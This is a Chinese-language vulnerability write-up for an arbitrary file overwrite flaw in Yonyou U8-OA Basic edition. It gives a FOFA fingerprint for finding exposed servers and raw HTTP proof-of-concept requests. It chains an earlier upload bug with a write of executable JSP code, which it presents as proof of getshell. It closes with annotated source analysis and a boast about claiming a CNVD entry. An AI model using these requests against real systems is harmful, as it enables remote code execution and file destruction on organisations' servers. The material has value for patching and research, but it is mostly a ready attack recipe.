漏洞描述
用友U8-OA基础版存在任意文件覆盖写入漏洞
漏洞说明:用友U8-OA基础版因为代码问题,存在任意文件覆盖写入漏洞,可以覆盖写入系统中存在的文件,可getshell。
FOFA指纹:
body="致远" && "/yyoa/" && icon_hash="23842899"
产品版本证明:根据上方fofa检索到的结果,任意打开一个系统,在系统登陆界面底部有版本信息
漏洞POC:
GET /yyoa/portal/style/controller/operaFileActionController.jsp?path={系统中存在的文件路径}&type=jsp&fileop=save&context=111 HTTP/1.1
Host: host
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=8AF8525D562E345BD18FA00F6E28FFAD
Connection: close验证截图:
用友U8-OA基础版
1、先使用之前存在的任意文件上传漏洞,上传一个jsp后缀文件到系统中,当然此处也可以直接使用系统中存在的jsp 文件直接覆盖写入,但存在破坏性。
POST /xxx/doUpload.jsp HTTP/1.1
Host: xxx:xx80
Content-Length: 298
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygKGvx2gFuemASlq2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=1BDC1511726B24DF9B75FD554960F96A; JSESSIONID=0B4A41EA32B167EC5531DD0F78E4C10D
Connection: close
------WebKitFormBoundarygKGvx2gFuemASlq2
Content-Disposition: form-data; name="myfile"; filename="test.jsp"
Content-Type: application/octet-stream
11111
------WebKitFormBoundarygKGvx2gFuemASlq2--上传文件,文件内容为:11111
上传后的路径为:
http://xxx/upload/1695830703194.jsp
2、验证文件覆盖写入漏洞:
GET /xxx/operaFileActionController.jsp?path=/xxx/upload/1695830703194.jsp&type=jsp&fileop=save&context=%3C%25out.print%28999%2A999%29%3Bnew+java.io.File%28application.getRealPath%28request.getServletPath%28%29%29%29.delete%28%29%3B%25%3E HTTP/1.1
Host: xxx:xx81
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=8AF8525D562E345BD18FA00F6E28FFAD
Connection: close
此处写入的内容为:
<%out.print(999*999);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> 访问一次后自动删除,证明可解析,以及可getshell。
源码下载地址:
在咸鱼购买到对应系统的安装包,点击安装后在对应安装目录生成源码。
源代码分析,源代码路径为:
/xxxx/operaFileActionController.jsp
<%@page language="java"%>
<%@page session="true"%>
<%@page contentType="text/html;charset=GBK"%>
<%@page import="java.sql.SQLException"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="code3.www.seeyon.com.apps.portal.style.tools.OperaFile"%>
<%
response.setContentType("text/html;charset=gbk");
String fileName = request.getParameter("path");
String fileType = request.getParameter("type");
String fileOp = request.getParameter("fileop");
String cont = request.getParameter("context");
String typeid = request.getParameter("typeid");
# 通过get方式传参,获取参数值
int sucess = 0;
String allPath = "";
allPath = fileName;
OperaFile op = new OperaFile();
File file = null;
String path=this.getServletContext().getRealPath("/");
try {
String p = path + allPath;
# 拼接完整路径,path为根路径: /yyoa/ allPath为前端输入的文件路径,用户可控。
} else if(fileOp.equals("save")) {
# 如果fileOp的值为save,则执行写入传递的内容并覆盖保存文件的动作
if(fileType.equals("css")) {
cont = java.net.URLDecoder.decode(cont, "GBK");
}
if(op.fileExists(p) == 1) {
# 判断输入拼接的文件绝对路径是否存在
file = new File(p);
sucess = op.writeFile(file, cont);
# 文件类型fileType赋值为jsp, 文件内容为context参数的值,
if(sucess == 1) {
out.print("文件保存成功!");
} else {
out.print("文件保存失败!");
}
} else {
out.print("此文件不存在,请先上传文件!");
}
}到了此处高危CNVD就到手了!!!
